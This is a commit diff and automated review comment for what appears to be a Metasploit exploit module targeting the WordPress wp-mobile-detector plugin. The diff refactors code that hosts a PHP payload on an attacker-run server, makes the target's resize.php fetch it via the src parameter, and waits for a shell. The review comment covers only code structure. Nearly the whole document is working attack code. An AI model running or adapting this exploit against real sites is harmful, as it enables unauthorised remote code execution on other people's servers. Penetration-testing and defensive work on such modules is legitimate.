
Commit 3847a68

committed
Clean up module
1 parent 037c58d commit 3847a68


1 file changed

+6
-17
lines changed


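--- a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb
+++ b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb
@@ -6,9 +6,9 @@
 class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 
-include Msf::Exploit::FileDropper
 include Msf::Exploit::Remote::HTTP::Wordpress
 include Msf::Exploit::Remote::HttpServer
+include Msf::Exploit::FileDropper
 
 def initialize(info = {})
 super(update_info(
@@ -50,9 +50,6 @@ def check
 end
 
 def exploit
-if datastore['SRVHOST'] == '0.0.0.0'
-fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from rhost')
-end
 payload_name = rand_text_alphanumeric(10) + '.php'
 
 # First check to see if the file is written already, if it is cache wont retrieve it from us
@@ -69,29 +66,22 @@ def exploit
 
 def on_request_uri(cli, _request)
 print_good('Payload requested on server, sending')
-send_response(cli, payload.encoded, {})
+send_response(cli, payload.encoded)
 end
 
 print_status('Starting Payload Server')
-payload_url = '/' + payload_name
-start_service('Uri' => {
-'Path' => payload_url,
-'Proc' => proc do |cli, req|
-on_request_uri(cli, req)
-end
-})
+start_service('Path' => "/#{payload_name}")
 
-payload_full_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + payload_url
-print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{payload_full_url}")
+print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{get_uri}")
 
 res = send_request_cgi(
 'global' => true,
 'method' => 'GET',
 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php'),
-'vars_get' => {'src' => payload_full_url}
+'vars_get' => {'src' => get_uri}
 )
 
-if res && res.code == 200
+if res && res.code == 200
 print_good('Sleeping 5 seconds for payload upload')
 register_files_for_cleanup(payload_name)
 
@@ -104,7 +94,6 @@ def on_request_uri(cli, _request)
 })
 # wait for callback, without this we exit too fast and miss our shell
 Rex.sleep(2)
-handler
 else
 if res.nil?
 fail_with(Failure::Unreachable, 'No response from the target')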
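Review bot: `on_request_uri` is still defined inside the body of `exploit`, which this cleanup leaves in place. The local `payload_name` is used in `start_service('Path' => "/#{payload_name}")` after the nested `def` closes, so those statements can only belong to `exploit`. A nested `def` is installed on the class only once `exploit` has run. Now that the explicit `'Proc'` is gone, the callback is presumably looked up by name through the HttpServer mixin, so the method reads better at class level next to `check` and `exploit`. Separately, `get_uri` is evaluated twice, once in the status line and once in `vars_get`; assigning it once, `src_uri = get_uri`, and using `src_uri` in both places keeps the logged and requested values in step. The body of `exploit` continues past the last hunk, so the rest of the method was not reviewed.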
